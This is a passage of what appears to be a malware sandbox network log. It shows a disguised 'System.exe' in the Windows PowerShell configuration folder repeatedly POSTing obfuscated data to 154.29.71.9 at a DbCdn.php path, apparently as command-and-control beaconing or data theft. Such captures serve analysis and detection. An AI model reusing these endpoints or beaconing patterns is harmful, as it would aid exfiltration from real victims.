                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49748 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:52:26.805159092 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:52:27.165388107 CET | 2600 | OUT | Data Raw: 59 59 58 5a 5b 54 5d 57 5b 59 5a 55 50 5a 5b 51 56 52 54 48 52 5d 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YYXZ[T]W[YZUPZ[QVRTHR]RZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9;>$(*P=4Y+,';+8U9!.;#86(-;&8Z9"Y ']/,
Jan 4, 2025 14:52:27.350290060 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:52:27.483858109 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:27 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49749 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:52:27.665738106 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:52:28.020119905 CET | 2600 | OUT | Data Raw: 5c 5d 58 5b 5b 5c 5d 56 5b 59 5a 55 50 50 5b 5b 56 51 54 46 52 5e 52 59 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \]X[[\]V[YZUPP[[VQTFR^RYU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:/>9X%^:P*-$+=3T$3;#)!-/U"-V)=$A%# Z9"Y ']/
Jan 4, 2025 14:52:28.190926075 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:52:28.320087910 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:28 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49751 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:52:28.448302031 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:52:28.801211119 CET | 2600 | OUT | Data Raw: 59 5e 5d 58 5b 5e 5d 54 5b 59 5a 55 50 5d 5b 5a 56 56 54 46 52 5a 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y^]X[^]T[YZUP][ZVVTFRZRQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:,X9289=-?+$8Y,3*T!+V"+=P>>72$Z:/"Y ']/0
Jan 4, 2025 14:52:28.972592115 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:52:29.102885962 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:28 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49752 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:52:29.234065056 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:52:29.582921982 CET | 2600 | OUT | Data Raw: 5c 5b 58 51 5b 5d 5d 50 5b 59 5a 55 50 5f 5b 5a 56 5d 54 43 52 5f 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \[XQ[]]P[YZUP_[ZV]TCR_R\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\98_%*.<[(>(08,_,02P5=58)4E1# X-"Y ']/
Jan 4, 2025 14:52:29.766499043 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:52:29.913481951 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:29 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49754 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:52:30.077143908 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1876
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49755 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:52:30.444156885 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:52:30.801223993 CET | 2600 | OUT | Data Raw: 59 50 58 50 5b 5e 5d 57 5b 59 5a 55 50 5c 5b 53 56 5c 54 40 52 5c 52 5e 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YPXP[^]W[YZUP\[SV\T@R\R^U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9[.>Z%;9*>;(3],X8.!=V"))7&##./"Y ']/4
Jan 4, 2025 14:52:30.980217934 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:52:31.114032030 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:30 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    15 | 192.168.2.4 | 49756 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:31.244667053 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:31.598114967 CET | 2600 | OUT | Data: [POST body, 2600 bytes]
                                                                                                    Jan 4, 2025 14:52:31.761879921 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:31.890424967 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:31 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    16 | 192.168.2.4 | 49757 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:32.067415953 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:32.426287889 CET | 2600 | OUT | Data: [POST body, 2600 bytes]
                                                                                                    Jan 4, 2025 14:52:32.747458935 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:32.879081011 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:32 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    17 | 192.168.2.4 | 49758 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:33.360832930 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:33.707468033 CET | 2600 | OUT | Data: [POST body, 2600 bytes]
                                                                                                    Jan 4, 2025 14:52:33.877618074 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:34.006124020 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:33 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    18 | 192.168.2.4 | 49759 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:34.140182018 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:34.488822937 CET | 2600 | OUT | Data: [POST body, 2600 bytes]
                                                                                                    Jan 4, 2025 14:52:34.697588921 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:34.826133966 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:34 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    19 | 192.168.2.4 | 49760 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:34.967447042 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    20 | 192.168.2.4 | 49761 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:35.215934038 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1856
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:35.568012953 CET | 1856 | OUT | Data: [POST body, 1856 bytes]
                                                                                                    Jan 4, 2025 14:52:35.783101082 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:35.921016932 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:35 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data: [chunked response body]


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    21 | 192.168.2.4 | 49762 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:35.347524881 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:35.694494963 CET | 2600 | OUT | Data: [POST body, 2600 bytes]
                                                                                                    Jan 4, 2025 14:52:35.899853945 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:36.030916929 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:35 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    22 | 192.168.2.4 | 49763 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:36.176345110 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:36.535666943 CET | 2600 | OUT | Data: [POST body, 2600 bytes]
                                                                                                    Jan 4, 2025 14:52:36.795264959 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:36.957587004 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:36 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    23 | 192.168.2.4 | 49764 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:37.089591980 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:37.441951990 CET | 2600 | OUT | Data: [POST body, 2600 bytes]
                                                                                                    Jan 4, 2025 14:52:37.623141050 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:37.752001047 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:37 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    24 | 192.168.2.4 | 49765 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:38.051203966 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:38.411748886 CET | 2600 | OUT
                                                                                                    Jan 4, 2025 14:52:38.586404085 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:38.717899084 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:38 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    25 | 192.168.2.4 | 49766 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:38.866938114 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:39.223089933 CET | 2600 | OUT
                                                                                                    Jan 4, 2025 14:52:39.384315968 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:39.518296957 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:39 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
